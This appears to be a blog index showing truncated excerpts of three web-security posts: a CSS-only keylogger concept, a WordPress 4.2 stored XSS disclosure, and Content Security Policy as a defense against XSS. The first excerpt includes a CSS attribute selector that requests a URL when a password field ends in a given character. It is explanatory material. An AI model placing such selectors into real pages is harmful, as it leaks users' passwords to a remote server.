CSS Keylogger (and why you shouldn’t worry about it)

Leveraging CSS attribute selectors it – in theory – is possible to write a keylogger in pure CSS. The selector below for example targets all input[type=”password”] elements whose last character is an a: input[type=”password”][value$=”a”] { background-image: url(“http://localhost:3000/a”); } The theory goes that whenever a user presses the a character inside an input[type=”password”], a request to […]

WordPress 4.2 Stored XSS

Earlier this week WordPress 4.1.3. It fixed an XSS exploit discovered by a former student of mine. This week a new exploit – even in the new WordPress versions, including 4.2 – was uncovered. Current versions of WordPress are vulnerable to a stored XSS. An unauthenticated attacker can inject JavaScript in WordPress comments. If triggered […]

Content Security Policy — Preventing XSS Attacks Client-side

An extra measure to preventing Cross-Site Scripting has now become a standard ready to be implemented. It’s as easy as including this header in your sites Content-Security-Policy: script-src ‘self’; img-src ‘none’ With this, external scripts and images won’t be loaded on your site. This new header however doesn’t mean you’re fully protected once you include […]